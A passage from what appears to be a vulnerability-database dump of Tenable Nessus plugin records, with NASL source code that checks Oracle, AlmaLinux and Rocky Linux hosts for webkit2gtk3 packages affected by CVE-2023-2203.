Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 9', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-04T13:43:54", "description": "The remote AlmaLinux 9 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2023:2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-14T00:00:00", "type": "nessus", "title": "AlmaLinux 9 : webkit2gtk3 (ALSA-2023:2653)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-08-02T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:9", "cpe:/o:alma:linux:9::appstream", "cpe:/o:alma:linux:9::baseos", "cpe:/o:alma:linux:9::crb", "cpe:/o:alma:linux:9::highavailability", "cpe:/o:alma:linux:9::nfv", "cpe:/o:alma:linux:9::realtime", "cpe:/o:alma:linux:9::resilientstorage", "cpe:/o:alma:linux:9::sap", "cpe:/o:alma:linux:9::sap_hana", "cpe:/o:alma:linux:9::supplementary"], "id": "ALMA_LINUX_ALSA-2023-2653.NASL", "href": "https://www.tenable.com/plugins/nessus/175607", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2023:2653.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175607);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/02\");\n\n script_cve_id(\"CVE-2023-2203\");\n script_xref(name:\"ALSA\", value:\"2023:2653\");\n\n script_name(english:\"AlmaLinux 9 : webkit2gtk3 (ALSA-2023:2653)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 9 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2023:2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/9/ALSA-2023-2653.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::crb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9::supplementary\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 9.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-08T13:31:36", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-19T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : webkit2gtk3 (ALSA-2023:3108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-29T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:8", "cpe:/o:alma:linux:8::appstream", "cpe:/o:alma:linux:8::baseos", "cpe:/o:alma:linux:8::highavailability", "cpe:/o:alma:linux:8::nfv", "cpe:/o:alma:linux:8::powertools", "cpe:/o:alma:linux:8::realtime", "cpe:/o:alma:linux:8::resilientstorage", "cpe:/o:alma:linux:8::sap", "cpe:/o:alma:linux:8::sap_hana", "cpe:/o:alma:linux:8::supplementary"], "id": "ALMA_LINUX_ALSA-2023-3108.NASL", "href": "https://www.tenable.com/plugins/nessus/176131", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2023:3108.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(176131);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/29\");\n\n script_cve_id(\"CVE-2023-2203\");\n script_xref(name:\"ALSA\", value:\"2023:3108\");\n\n script_name(english:\"AlmaLinux 8 : webkit2gtk3 (ALSA-2023:3108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2023-3108.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::supplementary\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-08T13:30:40", "description": "The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-18T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : webkit2gtk3 (RLSA-2023:3108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-29T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2023-3108.NASL", "href": "https://www.tenable.com/plugins/nessus/176085", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2023:3108.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(176085);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/29\");\n\n script_cve_id(\"CVE-2023-2203\");\n script_xref(name:\"RLSA\", value:\"2023:3108\");\n\n script_name(english:\"Rocky Linux 8 : webkit2gtk3 (RLSA-2023:3108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2023:3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2023:3108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=2188543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n 